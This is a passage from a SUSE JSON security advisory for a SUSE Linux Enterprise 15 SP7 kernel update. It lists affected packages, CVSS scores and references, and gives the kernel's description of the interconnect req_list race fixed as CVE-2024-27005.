"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2023-54013"
},
{
"cve": "CVE-2024-27005",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-27005"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ninterconnect: Don\u0027t access req_list while it\u0027s being manipulated\n\nThe icc_lock mutex was split into separate icc_lock and icc_bw_lock\nmutexes in [1] to avoid lockdep splats. However, this didn\u0027t adequately\nprotect access to icc_node::req_list.\n\nThe icc_set_bw() function will eventually iterate over req_list while\nonly holding icc_bw_lock, but req_list can be modified while only\nholding icc_lock. This causes races between icc_set_bw(), of_icc_get(),\nand icc_put().\n\nExample A:\n\n CPU0 CPU1\n ---- ----\n icc_set_bw(path_a)\n mutex_lock(\u0026icc_bw_lock);\n icc_put(path_b)\n mutex_lock(\u0026icc_lock);\n aggregate_requests()\n hlist_for_each_entry(r, ...\n hlist_del(...\n \u003cr = invalid pointer\u003e\n\nExample B:\n\n CPU0 CPU1\n ---- ----\n icc_set_bw(path_a)\n mutex_lock(\u0026icc_bw_lock);\n path_b = of_icc_get()\n of_icc_get_by_index()\n mutex_lock(\u0026icc_lock);\n path_find()\n path_init()\n aggregate_requests()\n hlist_for_each_entry(r, ...\n hlist_add_head(...\n \u003cr = invalid pointer\u003e\n\nFix this by ensuring icc_bw_lock is always held before manipulating\nicc_node::req_list. The additional places icc_bw_lock is held don\u0027t\nperform any memory allocations, so we should still be safe from the\noriginal lockdep splats that motivated the separate locks.\n\n[1] commit af42269c3523 (\"interconnect: Fix locking for runpm vs reclaim\")",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-27005",
"url": "https://www.suse.com/security/cve/CVE-2024-27005"
},
{
"category": "external",
"summary": "SUSE Bug 1223800 for CVE-2024-27005",
"url": "https://bugzilla.suse.com/1223800"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
